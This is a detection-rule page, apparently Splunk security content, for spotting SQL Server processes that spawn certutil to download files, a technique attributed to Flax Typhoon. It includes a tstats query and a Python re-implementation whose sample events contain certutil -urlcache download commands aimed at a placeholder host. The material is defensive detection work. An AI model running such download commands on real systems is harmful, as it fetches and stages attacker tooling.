LoFP / The occurrence of false positives should be minimal, given that the SQL agent does not typically download software using certutil.


Sample rules

Windows SQL Spawning CertUtil


The following analytic detects the use of certutil to download software, a behavior exhibited by the threat actor Flax Typhoon. This actor deploys a VPN connection by downloading an executable file for SoftEther VPN from their network infrastructure using one of several LOLBins, including certutil. The actor then uses the Service Control Manager (SCM) to create a Windows service that launches the VPN connection automatically when the system starts. This allows the actor to monitor the availability of the compromised system and establish an RDP connection.

The analytic identifies this behavior by monitoring for certutil, spawned by a SQL Server process, being used to download software. This is worth identifying for a SOC because it indicates a potential compromise of the system and the establishment of a persistent threat. A true positive suggests an attacker has gained access to the environment and is attempting to maintain that access, potentially leading to further malicious activities such as data theft or ransomware attacks.

Be aware of potential false positives: legitimate uses of certutil in your environment may cause benign activities to be flagged. Upon triage, review the command executed and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.

Detection logic

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("sqlservr.exe", "sqlagent.exe", "sqlps.exe", "launchpad.exe", "sqldumper.exe") `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id 
| `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `windows_sql_spawning_certutil_filter`
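
The predicate of the query above, re-implemented over constructed process-creation events to show which ones fire (an added example, not part of the original rule or of Splunk's content). It assumes the `process_certutil` macro matches the process name certutil.exe or the original file name CertUtil.exe and that matching is case-insensitive; the sample events and the `is_certutil`, `matches_rule` and `triage` helpers are hypothetical.

```python
SQL_PARENTS = {"sqlservr.exe", "sqlagent.exe", "sqlps.exe",
               "launchpad.exe", "sqldumper.exe"}


def is_certutil(event):
    # Assumption: stands in for the `process_certutil` macro, matching the image
    # name or the PE original file name so a renamed copy still counts.
    names = (event.get("process_name", ""), event.get("original_file_name", ""))
    return any(n.lower() == "certutil.exe" for n in names)


def matches_rule(event):
    """True when a SQL Server parent spawns certutil with 'urlcache' in its command line."""
    if event.get("parent_process_name", "").lower() not in SQL_PARENTS:
        return False
    # (*urlcache* AND *split*) OR *urlcache* reduces to *urlcache*.
    # Assumption: comparison is case-insensitive, hence lower().
    return is_certutil(event) and "urlcache" in event.get("process", "").lower()


# Constructed events; field names follow the query's by-clause, "id" is a label.
SAMPLE_EVENTS = [
    {"id": "sql-download", "parent_process_name": "sqlservr.exe",
     "process_name": "certutil.exe", "original_file_name": "CertUtil.exe",
     "process": "certutil.exe -urlcache -split http://example.invalid/a.bin"},
    {"id": "sql-renamed", "parent_process_name": "sqlagent.exe",
     "process_name": "cu.exe", "original_file_name": "CertUtil.exe",
     "process": "cu.exe -urlcache http://example.invalid/a.bin"},
    # certutil under SQL Server without urlcache: not a download, no alert.
    {"id": "sql-hashfile", "parent_process_name": "sqlservr.exe",
     "process_name": "certutil.exe", "original_file_name": "CertUtil.exe",
     "process": r"certutil.exe -hashfile D:\backup\db.bak SHA256"},
    # Direct parent is not a SQL Server process: outside this rule's scope.
    {"id": "non-sql-parent", "parent_process_name": "cmd.exe",
     "process_name": "certutil.exe", "original_file_name": "CertUtil.exe",
     "process": "certutil.exe -urlcache -split http://example.invalid/a.bin"},
]


def triage(events):
    """Return the ids of events the rule would alert on."""
    return [e["id"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```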